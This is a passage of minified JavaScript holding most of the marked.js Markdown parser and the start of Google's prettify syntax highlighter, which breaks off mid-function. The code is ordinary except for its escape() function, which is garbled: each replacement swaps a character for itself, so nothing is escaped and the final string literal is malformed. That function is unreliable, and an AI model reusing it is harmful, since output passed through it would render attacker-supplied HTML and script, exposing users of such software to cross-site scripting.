('hr',/\n+(?=(?: *[-*_]){3,} *(?:\n+|$))/)
();block._tag='(?!(?:'
+'a|em|strong|small|s|cite|q|dfn|abbr|data|time|code'
+'|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo'
+'|span|br|wbr|ins|del|img)\\b)\\w+(?!:/|@)\\b';block.html=replace(block.html)
('comment',/<!--[\s\S]*?-->/)
('closed',/<(tag)[\s\S]+?<\/\1>/)
('closing',/<tag(?:"[^"]*"|'[^']*'|[^'">])*?>/)
(/tag/g,block._tag)
();block.paragraph=replace(block.paragraph)
('hr',block.hr)
('heading',block.heading)
('lheading',block.lheading)
('blockquote',block.blockquote)
('tag','<'+block._tag)
('def',block.def)
();block.normal=merge({},block);block.gfm=merge({},block.normal,{fences:/^ *(`{3,}|~{3,}) *(\w+)? *\n([\s\S]+?)\s*\1 *(?:\n+|$)/,paragraph:/^/});block.gfm.paragraph=replace(block.paragraph)
('(?!','(?!'+block.gfm.fences.source.replace('\\1','\\2')+'|')
();block.tables=merge({},block.gfm,{nptable:/^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/,table:/^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/});function Lexer(options){this.tokens=[];this.tokens.links={};this.options=options||marked.defaults;this.rules=block.normal;if(this.options.gfm){if(this.options.tables){this.rules=block.tables;}else{this.rules=block.gfm;}}}
Lexer.rules=block;Lexer.lex=function(src,options){var lexer=new Lexer(options);return lexer.lex(src);};Lexer.prototype.lex=function(src){src=src.replace(/\r\n|\r/g,'\n').replace(/\t/g,' ').replace(/\u00a0/g,' ').replace(/\u2424/g,'\n');return this.token(src,true);};Lexer.prototype.token=function(src,top){var src=src.replace(/^ +$/gm,''),next,loose,cap,bull,b,item,space,i,l;while(src){if(cap=this.rules.newline.exec(src)){src=src.substring(cap[0].length);if(cap[0].length>1){this.tokens.push({type:'space'});}}
if(cap=this.rules.code.exec(src)){src=src.substring(cap[0].length);cap=cap[0].replace(/^ {4}/gm,'');this.tokens.push({type:'code',text:!this.options.pedantic?cap.replace(/\n+$/,''):cap});continue;}
if(cap=this.rules.fences.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'code',lang:cap[2],text:cap[3]});continue;}
if(cap=this.rules.heading.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'heading',depth:cap[1].length,text:cap[2]});continue;}
if(top&&(cap=this.rules.nptable.exec(src))){src=src.substring(cap[0].length);item={type:'table',header:cap[1].replace(/^ *| *\| *$/g,'').split(/ *\| */),align:cap[2].replace(/^ *|\| *$/g,'').split(/ *\| */),cells:cap[3].replace(/\n$/,'').split('\n')};for(i=0;i<item.align.length;i++){if(/^ *-+: *$/.test(item.align[i])){item.align[i]='right';}else if(/^ *:-+: *$/.test(item.align[i])){item.align[i]='center';}else if(/^ *:-+ *$/.test(item.align[i])){item.align[i]='left';}else{item.align[i]=null;}}
for(i=0;i<item.cells.length;i++){item.cells[i]=item.cells[i].split(/ *\| */);}
this.tokens.push(item);continue;}
if(cap=this.rules.lheading.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'heading',depth:cap[2]==='='?1:2,text:cap[1]});continue;}
if(cap=this.rules.hr.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'hr'});continue;}
if(cap=this.rules.blockquote.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'blockquote_start'});cap=cap[0].replace(/^ *> ?/gm,'');this.token(cap,top);this.tokens.push({type:'blockquote_end'});continue;}
if(cap=this.rules.list.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'list_start',ordered:isFinite(cap[2])});cap=cap[0].match(this.rules.item);if(this.options.smartLists){bull=block.bullet.exec(cap[0])[0];}
next=false;l=cap.length;i=0;for(;i<l;i++){item=cap[i];space=item.length;item=item.replace(/^ *([*+-]|\d+\.) +/,'');if(~item.indexOf('\n ')){space-=item.length;item=!this.options.pedantic?item.replace(new RegExp('^ {1,'+space+'}','gm'),''):item.replace(/^ {1,4}/gm,'');}
if(this.options.smartLists&&i!==l-1){b=block.bullet.exec(cap[i+1])[0];if(bull!==b&&!(bull[1]==='.'&&b[1]==='.')){src=cap.slice(i+1).join('\n')+src;i=l-1;}}
loose=next||/\n\n(?!\s*$)/.test(item);if(i!==l-1){next=item[item.length-1]==='\n';if(!loose)loose=next;}
this.tokens.push({type:loose?'loose_item_start':'list_item_start'});this.token(item,false);this.tokens.push({type:'list_item_end'});}
this.tokens.push({type:'list_end'});continue;}
if(cap=this.rules.html.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:this.options.sanitize?'paragraph':'html',pre:cap[1]==='pre',text:cap[0]});continue;}
if(top&&(cap=this.rules.def.exec(src))){src=src.substring(cap[0].length);this.tokens.links[cap[1].toLowerCase()]={href:cap[2],title:cap[3]};continue;}
if(top&&(cap=this.rules.table.exec(src))){src=src.substring(cap[0].length);item={type:'table',header:cap[1].replace(/^ *| *\| *$/g,'').split(/ *\| */),align:cap[2].replace(/^ *|\| *$/g,'').split(/ *\| */),cells:cap[3].replace(/(?: *\| *)?\n$/,'').split('\n')};for(i=0;i<item.align.length;i++){if(/^ *-+: *$/.test(item.align[i])){item.align[i]='right';}else if(/^ *:-+: *$/.test(item.align[i])){item.align[i]='center';}else if(/^ *:-+ *$/.test(item.align[i])){item.align[i]='left';}else{item.align[i]=null;}}
for(i=0;i<item.cells.length;i++){item.cells[i]=item.cells[i].replace(/^ *\| *| *\| *$/g,'').split(/ *\| */);}
this.tokens.push(item);continue;}
if(top&&(cap=this.rules.paragraph.exec(src))){src=src.substring(cap[0].length);this.tokens.push({type:'paragraph',text:cap[1][cap[1].length-1]==='\n'?cap[1].slice(0,-1):cap[1]});continue;}
if(cap=this.rules.text.exec(src)){src=src.substring(cap[0].length);this.tokens.push({type:'text',text:cap[0]});continue;}
if(src){throw new
Error('Infinite loop on byte: '+src.charCodeAt(0));}}
return this.tokens;};var inline={escape:/^\\([\\`*{}\[\]()#+\-.!_>])/,autolink:/^<([^ >]+(@|:\/)[^ >]+)>/,url:noop,tag:/^<!--[\s\S]*?-->|^<\/?\w+(?:"[^"]*"|'[^']*'|[^'">])*?>/,link:/^!?\[(inside)\]\(href\)/,reflink:/^!?\[(inside)\]\s*\[([^\]]*)\]/,nolink:/^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]/,strong:/^__([\s\S]+?)__(?!_)|^\*\*([\s\S]+?)\*\*(?!\*)/,em:/^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/,code:/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/,br:/^ {2,}\n(?!\s*$)/,del:noop,text:/^[\s\S]+?(?=[\\<!\[_*`]| {2,}\n|$)/};inline._inside=/(?:\[[^\]]*\]|[^\]]|\](?=[^\[]*\]))*/;inline._href=/\s*<?([^\s]*?)>?(?:\s+['"]([\s\S]*?)['"])?\s*/;inline.link=replace(inline.link)
('inside',inline._inside)
('href',inline._href)
();inline.reflink=replace(inline.reflink)
('inside',inline._inside)
();inline.normal=merge({},inline);inline.pedantic=merge({},inline.normal,{strong:/^__(?=\S)([\s\S]*?\S)__(?!_)|^\*\*(?=\S)([\s\S]*?\S)\*\*(?!\*)/,em:/^_(?=\S)([\s\S]*?\S)_(?!_)|^\*(?=\S)([\s\S]*?\S)\*(?!\*)/});inline.gfm=merge({},inline.normal,{escape:replace(inline.escape)('])','~|])')(),url:/^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])/,del:/^~~(?=\S)([\s\S]*?\S)~~/,text:replace(inline.text)
(']|','~]|')
('|','|https?://|')
()});inline.breaks=merge({},inline.gfm,{br:replace(inline.br)('{2,}','*')(),text:replace(inline.gfm.text)('{2,}','*')()});function InlineLexer(links,options){this.options=options||marked.defaults;this.links=links;this.rules=inline.normal;if(!this.links){throw new
Error('Tokens array requires a `links` property.');}
if(this.options.gfm){if(this.options.breaks){this.rules=inline.breaks;}else{this.rules=inline.gfm;}}else if(this.options.pedantic){this.rules=inline.pedantic;}}
InlineLexer.rules=inline;InlineLexer.output=function(src,links,opt){var inline=new InlineLexer(links,opt);return inline.output(src);};InlineLexer.prototype.output=function(src){var out='',link,text,href,cap;while(src){if(cap=this.rules.escape.exec(src)){src=src.substring(cap[0].length);out+=cap[1];continue;}
if(cap=this.rules.autolink.exec(src)){src=src.substring(cap[0].length);if(cap[2]==='@'){text=cap[1][6]===':'?this.mangle(cap[1].substring(7)):this.mangle(cap[1]);href=this.mangle('mailto:')+text;}else{text=escape(cap[1]);href=text;}
out+='<a href="'
+href
+'">'
+text
+'</a>';continue;}
if(cap=this.rules.url.exec(src)){src=src.substring(cap[0].length);text=escape(cap[1]);href=text;out+='<a href="'
+href
+'">'
+text
+'</a>';continue;}
if(cap=this.rules.tag.exec(src)){src=src.substring(cap[0].length);out+=this.options.sanitize?escape(cap[0]):cap[0];continue;}
if(cap=this.rules.link.exec(src)){src=src.substring(cap[0].length);out+=this.outputLink(cap,{href:cap[2],title:cap[3]});continue;}
if((cap=this.rules.reflink.exec(src))||(cap=this.rules.nolink.exec(src))){src=src.substring(cap[0].length);link=(cap[2]||cap[1]).replace(/\s+/g,' ');link=this.links[link.toLowerCase()];if(!link||!link.href){out+=cap[0][0];src=cap[0].substring(1)+src;continue;}
out+=this.outputLink(cap,link);continue;}
if(cap=this.rules.strong.exec(src)){src=src.substring(cap[0].length);out+='<strong>'
+this.output(cap[2]||cap[1])
+'</strong>';continue;}
if(cap=this.rules.em.exec(src)){src=src.substring(cap[0].length);out+='<em>'
+this.output(cap[2]||cap[1])
+'</em>';continue;}
if(cap=this.rules.code.exec(src)){src=src.substring(cap[0].length);out+='<code>'
+escape(cap[2],true)
+'</code>';continue;}
if(cap=this.rules.br.exec(src)){src=src.substring(cap[0].length);out+='<br>';continue;}
if(cap=this.rules.del.exec(src)){src=src.substring(cap[0].length);out+='<del>'
+this.output(cap[1])
+'</del>';continue;}
if(cap=this.rules.text.exec(src)){src=src.substring(cap[0].length);out+=escape(cap[0]);continue;}
if(src){throw new
Error('Infinite loop on byte: '+src.charCodeAt(0));}}
return out;};InlineLexer.prototype.outputLink=function(cap,link){if(cap[0][0]!=='!'){return'<a href="'
+escape(link.href)
+'"'
+(link.title?' title="'
+escape(link.title)
+'"':'')
+'>'
+this.output(cap[1])
+'</a>';}else{return'<img src="'
+escape(link.href)
+'" alt="'
+escape(cap[1])
+'"'
+(link.title?' title="'
+escape(link.title)
+'"':'')
+'>';}};InlineLexer.prototype.mangle=function(text){var out='',l=text.length,i=0,ch;for(;i<l;i++){ch=text.charCodeAt(i);if(Math.random()>0.5){ch='x'+ch.toString(16);}
out+='&#'+ch+';';}
return out;};function Parser(options){this.tokens=[];this.token=null;this.options=options||marked.defaults;}
Parser.parse=function(src,options){var parser=new Parser(options);return parser.parse(src);};Parser.prototype.parse=function(src){this.inline=new InlineLexer(src.links,this.options);this.tokens=src.reverse();var out='';while(this.next()){out+=this.tok();}
return out;};Parser.prototype.next=function(){return this.token=this.tokens.pop();};Parser.prototype.peek=function(){return this.tokens[this.tokens.length-1]||0;};Parser.prototype.parseText=function(){var body=this.token.text;while(this.peek().type==='text'){body+='\n'+this.next().text;}
return this.inline.output(body);};Parser.prototype.tok=function(){switch(this.token.type){case'space':{return'';}
case'hr':{return'<hr>\n';}
case'heading':{return'<h'
+this.token.depth
+'>'
+this.inline.output(this.token.text)
+'</h'
+this.token.depth
+'>\n';}
case'code':{if(this.options.highlight){var code=this.options.highlight(this.token.text,this.token.lang);if(code!=null&&code!==this.token.text){this.token.escaped=true;this.token.text=code;}}
if(!this.token.escaped){this.token.text=escape(this.token.text,true);}
return'<pre><code'
+(this.token.lang?' class="'
+this.options.langPrefix
+this.token.lang
+'"':'')
+'>'
+this.token.text
+'</code></pre>\n';}
case'table':{var body='',heading,i,row,cell,j;body+='<thead>\n<tr>\n';for(i=0;i<this.token.header.length;i++){heading=this.inline.output(this.token.header[i]);body+=this.token.align[i]?'<th align="'+this.token.align[i]+'">'+heading+'</th>\n':'<th>'+heading+'</th>\n';}
body+='</tr>\n</thead>\n';body+='<tbody>\n'
for(i=0;i<this.token.cells.length;i++){row=this.token.cells[i];body+='<tr>\n';for(j=0;j<row.length;j++){cell=this.inline.output(row[j]);body+=this.token.align[j]?'<td align="'+this.token.align[j]+'">'+cell+'</td>\n':'<td>'+cell+'</td>\n';}
body+='</tr>\n';}
body+='</tbody>\n';return'<table>\n'
+body
+'</table>\n';}
case'blockquote_start':{var body='';while(this.next().type!=='blockquote_end'){body+=this.tok();}
return'<blockquote>\n'
+body
+'</blockquote>\n';}
case'list_start':{var type=this.token.ordered?'ol':'ul',body='';while(this.next().type!=='list_end'){body+=this.tok();}
return'<'
+type
+'>\n'
+body
+'</'
+type
+'>\n';}
case'list_item_start':{var body='';while(this.next().type!=='list_item_end'){body+=this.token.type==='text'?this.parseText():this.tok();}
return'<li>'
+body
+'</li>\n';}
case'loose_item_start':{var body='';while(this.next().type!=='list_item_end'){body+=this.tok();}
return'<li>'
+body
+'</li>\n';}
case'html':{return!this.token.pre&&!this.options.pedantic?this.inline.output(this.token.text):this.token.text;}
case'paragraph':{return'<p>'
+this.inline.output(this.token.text)
+'</p>\n';}
case'text':{return'<p>'
+this.parseText()
+'</p>\n';}}};function escape(html,encode){return html.replace(!encode?/&(?!#?\w+;)/g:/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"').replace(/'/g,''');}
function replace(regex,opt){regex=regex.source;opt=opt||'';return function self(name,val){if(!name)return new RegExp(regex,opt);val=val.source||val;val=val.replace(/(^|[^\[])\^/g,'$1');regex=regex.replace(name,val);return self;};}
function noop(){}
noop.exec=noop;function merge(obj){var i=1,target,key;for(;i<arguments.length;i++){target=arguments[i];for(key in target){if(Object.prototype.hasOwnProperty.call(target,key)){obj[key]=target[key];}}}
return obj;}
function marked(src,opt){try{if(opt)opt=merge({},marked.defaults,opt);return Parser.parse(Lexer.lex(src,opt),opt);}catch(e){e.message+='\nPlease report this to https://github.com/chjj/marked.';if((opt||marked.defaults).silent){return'An error occured:\n'+e.message;}
throw e;}}
marked.options=marked.setOptions=function(opt){merge(marked.defaults,opt);return marked;};marked.defaults={gfm:true,tables:true,breaks:false,pedantic:false,sanitize:false,smartLists:false,silent:false,highlight:null,langPrefix:'lang-'};marked.Parser=Parser;marked.parser=Parser.parse;marked.Lexer=Lexer;marked.lexer=Lexer.lex;marked.InlineLexer=InlineLexer;marked.inlineLexer=InlineLexer.output;marked.parse=marked;if(typeof exports==='object'){module.exports=marked;}else if(typeof define==='function'&&define.amd){define(function(){return marked;});}else{this.marked=marked;}}).call(function(){return this||(typeof window!=='undefined'?window:global);}());
// Copyright (C) 2006 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
window['PR_SHOULD_USE_CONTINUATION']=true;var prettyPrintOne;var prettyPrint;(function(){var win=window;var FLOW_CONTROL_KEYWORDS=["break,continue,do,else,for,if,return,while"];var C_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"auto,case,char,const,default,"+"double,enum,extern,float,goto,int,long,register,short,signed,sizeof,"+"static,struct,switch,typedef,union,unsigned,void,volatile"];var COMMON_KEYWORDS=[C_KEYWORDS,"catch,class,delete,false,import,"+"new,operator,private,protected,public,this,throw,true,try,typeof"];var CPP_KEYWORDS=[COMMON_KEYWORDS,"alignof,align_union,asm,axiom,bool,"+"concept,concept_map,const_cast,constexpr,decltype,"+"dynamic_cast,explicit,export,friend,inline,late_check,"+"mutable,namespace,nullptr,reinterpret_cast,static_assert,static_cast,"+"template,typeid,typename,using,virtual,where"];var JAVA_KEYWORDS=[COMMON_KEYWORDS,"abstract,boolean,byte,extends,final,finally,implements,import,"+"instanceof,null,native,package,strictfp,super,synchronized,throws,"+"transient"];var CSHARP_KEYWORDS=[JAVA_KEYWORDS,"as,base,by,checked,decimal,delegate,descending,dynamic,event,"+"fixed,foreach,from,group,implicit,in,interface,internal,into,is,let,"+"lock,object,out,override,orderby,params,partial,readonly,ref,sbyte,"+"sealed,stackalloc,string,select,uint,ulong,unchecked,unsafe,ushort,"+"var,virtual,where"];var COFFEE_KEYWORDS="all,and,by,catch,class,else,extends,false,finally,"+"for,if,in,is,isnt,loop,new,no,not,null,of,off,on,or,return,super,then,"+"throw,true,try,unless,until,when,while,yes";var JSCRIPT_KEYWORDS=[COMMON_KEYWORDS,"debugger,eval,export,function,get,null,set,undefined,var,with,"+"Infinity,NaN"];var PERL_KEYWORDS="caller,delete,die,do,dump,elsif,eval,exit,foreach,for,"+"goto,if,import,last,local,my,next,no,our,print,package,redo,require,"+"sub,undef,unless,until,use,wantarray,while,BEGIN,END";var PYTHON_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"and,as,assert,class,def,del,"+"elif,except,exec,finally,from,global,import,in,is,lambda,"+"nonlocal,not,or,pass,print,raise,try,with,yield,"+"False,True,None"];var RUBY_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"alias,and,begin,case,class,"+"def,defined,elsif,end,ensure,false,in,module,next,nil,not,or,redo,"+"rescue,retry,self,super,then,true,undef,unless,until,when,yield,"+"BEGIN,END"];var SH_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"case,done,elif,esac,eval,fi,"+"function,in,local,set,then,until"];var ALL_KEYWORDS=[CPP_KEYWORDS,CSHARP_KEYWORDS,JSCRIPT_KEYWORDS,PERL_KEYWORDS+
PYTHON_KEYWORDS,RUBY_KEYWORDS,SH_KEYWORDS];var C_TYPES=/^(DIR|FILE|vector|(de|priority_)?queue|list|stack|(const_)?iterator|(multi)?(set|map)|bitset|u?(int|float)\d*)\b/;var PR_STRING='str';var PR_KEYWORD='kwd';var PR_COMMENT='com';var PR_TYPE='typ';var PR_LITERAL='lit';var PR_PUNCTUATION='pun';var PR_PLAIN='pln';var PR_TAG='tag';var PR_DECLARATION='dec';var PR_SOURCE='src';var PR_ATTRIB_NAME='atn';var PR_ATTRIB_VALUE='atv';var PR_NOCODE='nocode';var REGEXP_PRECEDER_PATTERN='(?:^^\\.?|[+-]|[!=]=?=?|\\#|%=?|&&?=?|\\(|\\*=?|[+\\-]=|->|\\/=?|::?|<<?=?|>>?>?=?|,|;|\\?|@|\\[|~|{|\\^\\^?=?|\\|\\|?=?|break|case|continue|delete|do|else|finally|instanceof|return|throw|try|typeof)\\s*';function combinePrefixPatterns(regexs){var capturedGroupIndex=0;var needToFoldCase=false;var ignoreCase=false;for(var i=0,n=regexs.length;i<n;++i){var regex=regexs[i];if(regex.ignoreCase){ignoreCase=true;}else if(/[a-z]/i.test(regex.source.replace(/\\u[0-9a-f]{4}|\\x[0-9a-f]{2}|\\[^ux]/gi,''))){needToFoldCase=true;ignoreCase=false;break;}}
var escapeCharToCodeUnit={'b':8,'t':9,'n':0xa,'v':0xb,'f':0xc,'r':0xd};function decodeEscape(charsetPart){var cc0=charsetPart.charCodeAt(0);if(cc0!==92){return cc0;}
var c1=charsetPart.charAt(1);cc0=escapeCharToCodeUnit[c1];if(cc0){return cc0;}else if('0'<=c1&&c1<='7'){return parseInt(charsetPart.substring(1),8);}else if(c1==='u'||c1==='x'){return parseInt(charsetPart.substring(2),16);}else{return charsetPart.charCodeAt(1);}}
function encodeEscape(charCode){if(charCode<0x20){return(charCode<0x10?'\\x0':'\\x')+charCode.toString(16);}
var ch=String.fromCharCode(charCode);return(ch==='\\'||ch==='-'||ch===']'||ch==='^')?"\\"+ch:ch;}
function caseFoldCharset(charSet){var charsetParts=charSet.substring(1,charSet.length-1).match(new RegExp('\\\\u[0-9A-Fa-f]{4}'
+'|\\\\x[0-9A-Fa-f]{2}'
+'|\\\\[0-3][0-7]{0,2}'
+'|\\\\[0-7]{1,2}'
+'|\\\\[\\s\\S]'
+'|-'
+'|[^-\\\\]','g'));var ranges=[];var inverse=charsetParts[0]==='^';var out=['['];if(inverse){out.push('^');}
for(var i=inverse?1:0,n=charsetParts.length;i<n;++i){var p=charsetParts[i];if(/\\[bdsw]/i.test(p)){out.push(p);}else{var start=decodeEscape(p);var end;if(i+2<n&&'-'===charsetParts[i+1]){end=decodeEscape(charsetParts[i+2]);i+=2;}else{end=start;}
ranges.push([start,end]);if(!(end<65||start>122)){if(!(end<65||start>90)){ranges.push([Math.max(65,start)|32,Math.min(end,90)|32]);}
if(!(end<97||start>122)){ranges.push([Math.max(97,start)&~32,Math.min(end,122)&~32]);}}}}
ranges.sort(function(a,b){return(a[0]-b[0])||(b[1]-a[1]);});var consolidatedRanges=[];var lastRange=[];for(var i=0;i<ranges.length;++i){var range=ranges[i];if(range[0]<=lastRange[1]+1){lastRange[1]=Math.max(lastRange[1],range[1]);}else{consolidatedRanges.push(lastRange=range);}}
for(var i=0;i<consolidatedRanges.length;++i){var range=consolidatedRanges[i];out.push(encodeEscape(range[0]));if(range[1]>range[0]){if(range[1]+1>range[0]){out.push('-');}
out.push(encodeEscape(range[1]));}}
out.push(']');return out.join('');}
function allowAnywhereFoldCaseAndRenumberGroups(regex){var parts=regex.source.match(new RegExp('(?:'
+'\\[(?:[^\\x5C\\x5D]|\\\\[\\s\\S])*\\]'
+'|\\\\u[A-Fa-f0-9]{4}'
+'|\\\\x[A-Fa-f0-9]{2}'
+'|\\\\[0-9]+'
+'|\\\\[^ux0-9]'
+'|\\(\\?[:!=]'
+'|[\\(\\)\\^]'
+'|[^\\x5B\\x5C\\(\\)\\^]+'
+')','g'));var n=parts.length;var capturedGroups=[];for(var i=0,groupIndex=0;i<n;++i){var p=parts[i];if(p==='('){++groupIndex;}else if('\\'===p.charAt(0)){var decimalValue=+p.substring(1);if(decimalValue){if(decimalValue<=groupIndex){capturedGroups[decimalValue]=-1;}else{parts[i]=encodeEscape(decimalValue);}}}}
for(var i=1;i<capturedGroups.length;++i){if(-1===capturedGroups[i]){capturedGroups[i]=++capturedGroupIndex;}}
for(var i=0,groupIndex=0;i<n;++i){var p=parts[i];if(p==='('){++groupIndex;if(!capturedGroups[groupIndex]){parts[i]='(?:';}}else if('\\'===p.charAt(0)){var decimalValue=+p.substring(1);if(decimalValue&&decimalValue<=groupIndex){parts[i]='\\'+capturedGroups[decimalValue];}}}
for(var i=0;i<n;++i){if('^'===parts[i]&&'^'!==parts[i+1]){parts[i]='';}}
if(regex.ignoreCase&&needToFoldCase){for(var i=0;i<n;++i){var p=parts[i];var ch0=p.charAt(0);if(p.length>=2&&ch0==='['){parts[i]=caseFoldCharset(p);}else if(ch0!=='\\'){parts[i]=p.replace(/[a-zA-Z]/g,function(ch){var cc=ch.charCodeAt(0);return'['+String.fromCharCode(cc&~32,cc|32)+']';});}}}
return parts.join('');}
var rewritten=[];for(var i=0,n=regexs.length;i<n;++i){var regex=regexs[i];if(regex.global||regex.multiline){throw new Error(''+regex);}
rewritten.push('(?:'+allowAnywhereFoldCaseAndRenumberGroups(regex)+')');}
return new RegExp(rewritten.join('|'),ignoreCase?'gi':'g');}
function extractSourceSpans(node,isPreformatted){var nocode=/(?:^|\s)nocode(?:\s|$)/;var chunks=[];var length=0;var spans=[];var k=0;function walk(node){switch(node.nodeType){case 1:if(nocode.test(node.className)){return;}
for(var child=node.firstChild;child;child=child.nextSibling){walk(child);}
var nodeName=node.nodeName.toLowerCase();if('br'===nodeName||'li'===nodeName){chunks[k]='\n';spans[k<<1]=length++;spans[(k++<<1)|1]=node;}
break;case 3:case 4:var text=node.nodeValue;if(text.length){if(!isPreformatted){text=text.replace(/[ \t\r\n]+/g,' ');}else{text=text.replace(/\r\n?/g,'\n');}
chunks[k]=text;spans[k<<1]=length;length+=text.length;spans[(k++<<1)|1]=node;}
break;}}
walk(node);return{sourceCode:chunks.join('').replace(/\n$/,''),spans:spans};}
function appendDecorations(basePos,sourceCode,langHandler,out){if(!sourceCode){return;}
var job={sourceCode:sourceCode,basePos:basePos};langHandler(job);out.push.apply(out,job.decorations);}
var notWs=/\S/;function childContentWrapper(element){var wrapper=undefined;for(var c=element.firstChild;c;c=c.nextSibling){var type=c.nodeType;wrapper=(type===1)?(wrapper?element:c):(type===3)?(notWs.test(c.nodeValue)?element:wrapper):wrapper;}
return wrapper===element?undefined:wrapper;}
function createSimpleLexer(shortcutStylePatterns,fallthroughStylePatterns){var shortcuts={};var tokenizer;(function(){var allPatterns=shortcutStylePatterns.concat(fallthroughStylePatterns);var allRegexs=[];var regexKeys={};for(var i=0,n=allPatterns.length;i<n;++i){var patternParts=allPatterns[i];var shortcutChars=patternParts[3];if(shortcutChars){for(var c=shortcutChars.length;--c>=0;){shortcuts[shortcutChars.charAt(c)]=patternParts;}}
var regex=patternParts[1];var k=''+regex;if(!regexKeys.hasOwnProperty(k)){allRegexs.push(regex);regexKeys[k]=null;}}
allRegexs.push(/[\0-\uffff]/);tokenizer=combinePrefixPatterns(allRegexs);})();var nPatterns=fallthroughStylePatterns.length;var decorate=function(job){var sourceCode=job.sourceCode,basePos=job.basePos;var decorations=[basePos,PR_PLAIN];var pos=0;var tokens=sourceCode.match(tokenizer)||[];var styleCache={};for(var ti=0,nTokens=tokens.length;ti<nTokens;++ti){var token=tokens[ti];var style=styleCache[token];var match=void 0;var isEmbedded;if(typeof style==='string'){isEmbedded=false;}else{var patternParts=shortcuts[token.charAt(0)];if(patternParts){match=token.match(patternParts[1]);style=patternParts[0];}else{for(var i=0;i<nPatterns;++i){patternParts=fallthroughStylePatterns[i];match=token.match(patternParts[1]);if(match){style=patternParts[0];break;}}
if(!match){style=PR_PLAIN;}}
isEmbedded=style.length>=5&&'lang-'===style.substring(0,5);if(isEmbedded&&!(match&&typeof match[1]==='string')){isEmbedded=false;style=PR_SOURCE;}
if(!isEmbedded){styleCache[token]=style;}}
var tokenStart=pos;pos+=token.length;if(!isEmbedded){decorations.push(basePos+tokenStart,style);}else{var embeddedSource=match[1];var embeddedSourceStart=token.indexOf(embeddedSource);var embeddedSourceEnd=embeddedSourceStart+embeddedSource.length;if(match[2]){embeddedSourceEnd=token.length-match[2].length;embeddedSourceStart=embeddedSourceEnd-embeddedSource.length;}
var lang=style.substring(5);appendDecorations(basePos+tokenStart,token.substring(0,embeddedSourceStart),decorate,decorations);appendDecorations(basePos+tokenStart+embeddedSourceStart,embeddedSource,langHandlerForExtension(lang,embeddedSource),decorations);appendDecorations(basePos+tokenStart+embeddedSourceEnd,token.substring(embeddedSourceEnd),decorate,decorations);}}
job.decorations=decorations;};return decorate;}
function sourceDecorator(options){var shortcutStylePatterns=[],fallthroughStylePatterns=[];if(options['tripleQuotedStrings']){shortcutStylePatterns.push([PR_STRING,/^(?:\'\'\'(?:[^\'\\]|\\[\s\S]|\'{1,2}(?=[^\']))*(?:\'\'\'|$)|\"\"\"(?:[^\"\\]|\\[\s\S]|\"{1,2}(?=[^\"]))*(?:\"\"\"|$)|\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$))/,null,'\'"']);}else if(options['multiLineStrings']){shortcutStylePatterns.push([PR_STRING,/^(?:\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$)|\`(?:[^\\\`]|\\[\s\S])*(?:\`|$))/,null,'\'"`']);}else{shortcutStylePatterns.push([PR_STRING,/^(?:\'(?:[^\\\'\r\n]|\\.)*(?:\'|$)|\"(?:[^\\\"\r\n]|\\.)*(?:\"|$))/,null,'"\'']);}
if(options['verbatimStrings']){fallthroughStylePatterns.push([PR_STRING,/^@\"(?:[^\"]|\"\")*(?:\"|$)/,null]);}
var hc=options['hashComments'];if(hc){if(options['cStyleComments']){if(hc>1){shortcutStylePatterns.push([PR_COMMENT,/^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/,null,'#']);}else{shortcutStylePatterns.push([PR_COMMENT,/^#(?:(?:define|e(?:l|nd)if|else|error|ifn?def|include|line|pragma|undef|warning)\b|[^\r\n]*)/,null,'#']);}
fallthroughStylePatterns.push([PR_STRING,/^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h(?:h|pp|\+\+)?|[a-z]\w*)>/,null]);}else{shortcutStylePatterns.push([PR_COMMENT,/^#[^\r\n]*/,null,'#']);}}
if(options['cStyleComments']){fallthroughStylePatterns.push([PR_COMMENT,/^\/\/[^\r\n]*/,null]);fallthroughStylePatterns.push([PR_COMMENT,/^\/\*[\s\S]*?(?:\*\/|$)/,null]);}
if(options['regexLiterals']){var REGEX_LITERAL=('/(?=[^/*])'
+'(?:[^/\\x5B\\x5C]'
+'|\\x5C[\\s\\S]'
+'|\\x5B(?:[^\\x5C\\x5D]|\\x5C[\\s\\S])*(?:\\x5D|$))+'
+'/');fallthroughStylePatterns.push(['lang-regex',new RegExp('^'+REGEXP_PRECEDER_PATTERN+'('+REGEX_LITERAL+')')]);}
var types=options['types'];if(types){fallthroughStylePatterns.push([PR_TYPE,types]);}
var keywords=(""+options['keywords']).replace(/^ | $/g,'');if(keywords.length){fallthroughStylePatterns.push([PR_KEYWORD,new RegExp('^(?:'+keywords.replace(/[\s,]+/g,'|')+')\\b'),null]);}
